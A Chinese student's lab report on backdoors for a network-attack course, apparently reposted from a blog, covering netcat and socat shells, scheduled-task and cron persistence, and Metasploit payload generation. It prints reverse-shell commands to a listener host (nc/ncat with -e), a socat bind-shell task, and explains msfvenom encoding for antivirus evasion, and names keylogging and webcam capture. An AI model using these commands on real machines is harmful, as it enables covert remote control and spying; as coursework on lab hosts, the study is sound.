实验内容
(1)使用netcat获取主机操作Shell,cron启动
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
基础问题
(1) 例举你能想到的一个后门进入到你系统中的可能方式?
当访问网站时,网页自动链接到下载木马程序的地址,并在后台自动下载安装木马,生成可执行文件,形成后门。
(2) 例举你知道的后门如何启动起来(win及linux)的方式?
Windows中:1、与其余的应用程序或者文件等捆绑起来并伪装成常用软件诱使用点击,只要执行这个应用程序,后门就会启动 2、后门设置成开机启动,开机后门即启动。Linux中:通过设置corn定时启动后门程序。
(3) Meterpreter有哪些给你映像深刻的功能?
1、植入后门可以控制被控主机的shell,执行指令 2、获取被控主机的录音、录像、截图、键盘输入记录等,窃取受害者信息。
(4)如何发现自己有系统有没有被安装后门?
打开防火墙,查看有没有异常开放的端口;安装杀毒软件,实时监控电脑,定时对系统进行检测;查看任务计划程序、开机自启动项、注册表项中是否有可疑程序。
相关知识
ncat
windows打开监听:ncat.exe -l -p 5107
Linux反弹连接win:nc 192.168.58.1 5107-e /bin/sh(IP为win IP)
windows下获得一个linux shell,可运行任何指令,如ls
Linux运行监听指令:nc -l -p 5107
Windows反弹连接Linux:ncat.exe -e cmd.exe 192.168.150.131 5107(IP为Linux IP)
Linux下看到Windows的命令提示
Windows下监听端口:ncat.exe -l -p 5107
Linux下连接到Windows的端口:nc 192.168.58.1 5107(IP为win IP)
建立连接之后,就可以传输数据
socat
Meterpreter
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
实验步骤
任务一:使用netcat获取主机操作Shell,cron启动。
任务二:使用socat获取主机操作Shell, 任务计划启动。
触发器
-
新建
新建触发器,然后确定操作
-新建
,导入你所下载解压后的socat.exe
的路径,在添加参数
中填入tcp-listen:5
107
exec:cmd.exe,pty,stderr
(意为把cmd.exe
绑定到端口5
107
,同时把cmd.exe
的stderr
重定向到stdout
上)Windows+L
快捷键锁定计算机,再次打开时,双击任务计划程序库
可以发现之前创建的任务已经开始运行,若未运行手动运行文件夹。socat - tcp:192.168.5
8
.1:5
107
(-
代表标准的输入输出,第二个流连接到Windows主机的5107端口,IP为windows的IP),接着可以发现已经成功获得一个cmd shell
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
实验过程中遇到的问题
1、socat与主机连接不上,解决的方法是找到任务目录手动运行创建的win任务,尝试多次锁定、打开主机,可执行连接。
2、使用MSF meterpreter生成可执行文件,利用ncat传送到主机时连接不上,经同学帮助,运用leafpad /etc/network/interfaces修改kali网络地址,使其和主机IP地址在同一网段,终于可以连接上了。
实验总结与体会
通过本次实验我了解了后门的基本原理,按照老师的指导和实验要求一步步完成实验,在不断出错、修正的反复实践的过程中,学习后门相关操作,体会到后门的"巨大威力",同时我也意识到网络安全问题的严重性,提高了自身网络安全意识。本次实验难度较大,耗时较长,但很有意思、收获巨大,我也感觉到自己网络对抗技术水平的薄弱,以后还要努力钻研,跟紧课程进度和老师节奏,继续学好后续系列知识。
2018-2019~3 20165107 《网络对抗技术》Exp2 后门原理与实践
原文:https://www.cnblogs.com/3523108059lyl/p/10586171.html